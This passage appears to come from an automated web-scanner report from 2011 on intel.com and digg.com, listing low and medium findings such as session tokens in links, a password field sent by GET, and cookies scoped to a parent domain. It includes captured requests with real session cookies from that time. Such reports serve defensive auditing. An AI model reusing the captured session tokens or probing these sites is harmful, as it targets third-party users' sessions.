INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:36 GMT
Date: Sat, 05 Feb 2011 23:18:36 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div align="center" xmlns:vam="Intel.Ebusiness.CB06" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:soa="http://tempuri.org/"><a href="http://sales.liveperson.net/hc/56727252/?cmd=file&amp;file=visitorWantsToChat&amp;site=56727252&amp;byhref=1&amp;SESSIONVAR!skill=NAResellerPrograms-English&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/livechat/eng/" target="chat56727252" xmlns:cd="urn:cd-scripts"><img border="0" src="http://sales.liveperson.net/hc/56727252/?cmd=repstate&amp;site=56727252&amp;channel=web&amp;&amp;ver=1&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/l
...[SNIP]...

9.2. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.intel.com
Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:29 GMT
Date: Sat, 05 Feb 2011 23:18:29 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<br><a href="http://sales.liveperson.net/hc/56727252/?cmd=file&amp;file=visitorWantsToChat&amp;site=56727252&amp;byhref=1&amp;SESSIONVAR%21skill=NAResellerPrograms-English&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/" target="chat56727252"><img src="http://chat.intel.com/hc/56727252/?cmd=repstate&amp;site=56727252&amp;channel=web&amp;&amp;ver=1&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/&amp;skill=NA
...[SNIP]...

9.3. http://www.intel.com/references/index.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.intel.com
Path:   /references/index.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /references/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Reference Room: Intel Business Success Stories</title>
...[SNIP]...
<li><a href="http://communities.intel.com/community/vproexpert;jsessionid=152C4B2202F8C74B9C1A846300448669">Intel. vPro. Expert Center</a>
...[SNIP]...
<li><a href="http://communities.intel.com/community/server;jsessionid=152C4B2202F8C74B9C1A846300448669">The Server Room</a>
...[SNIP]...

10. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11. Cookie scoped to parent domain  previous  next
There are 57 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://communities.intel.com/community/openportit/server  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/server

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/openportit/server HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=C3BB5A4A6127C798AA423278CD19252D.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 876
Content-Language: en-US
CacheHit: D=884319 t=1296947757183516
X-JSL: D=884325 t=1296947757183516
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.2. http://communities.intel.com/community/openportit/vproexpert  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/vproexpert

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/openportit/vproexpert HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=106FD2976BE417AFAD454527A8018E4E.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 255
Content-Language: en-US
CacheHit: D=264764 t=1296947757157494
X-JSL: D=264770 t=1296947757157494
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.3. http://communities.intel.com/community/tech  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/tech HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=A6A7D75900DB7F9498266317E36D34BE.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038313b; Expires=Mon, 07-Mar-2011 23:15:57 GMT; Path=/
X-JAL: 269
Content-Language: en-US
CacheHit: D=278002 t=1296947755835805
X-JSL: D=278007 t=1296947755835805
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.4. http://communities.intel.com/community/tech/desktop  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech/desktop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/tech/desktop HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=655258FED1C8CE54639970DB6AAC28EB.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038323b; Expires=Mon, 07-Mar-2011 23:15:54 GMT; Path=/
X-JAL: 111
Content-Language: en-US
CacheHit: D=120980 t=1296947753199224
X-JSL: D=120985 t=1296947753199224
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.5. http://communities.intel.com/index.jspa  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /index.jspa

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jspa HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=84414FB0E56F8779A8C027A76AA897B4.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
X-JAL: 497
Content-Language: en-US
CacheHit: D=506181 t=1296947752876810
X-JSL: D=506186 t=1296947752876810
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.6. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=E669082769D079AB1B6BB7D5060E305B.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=16105 t=1296956932351295
X-JSL: D=16111 t=1296956932351295
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 80219

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

11.7. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=033E5A52A6AE27B548A5D9EF6D8E5C5E.node6IPR; Domain=.intel.com; Path=/
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=12373 t=1296956932379103
X-JSL: D=12379 t=1296956932379103
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 49485

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

11.8. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=E514EB9C000C502ED588D726B4DEE54A.node6IPR; Domain=.intel.com; Path=/
X-JAL: 2
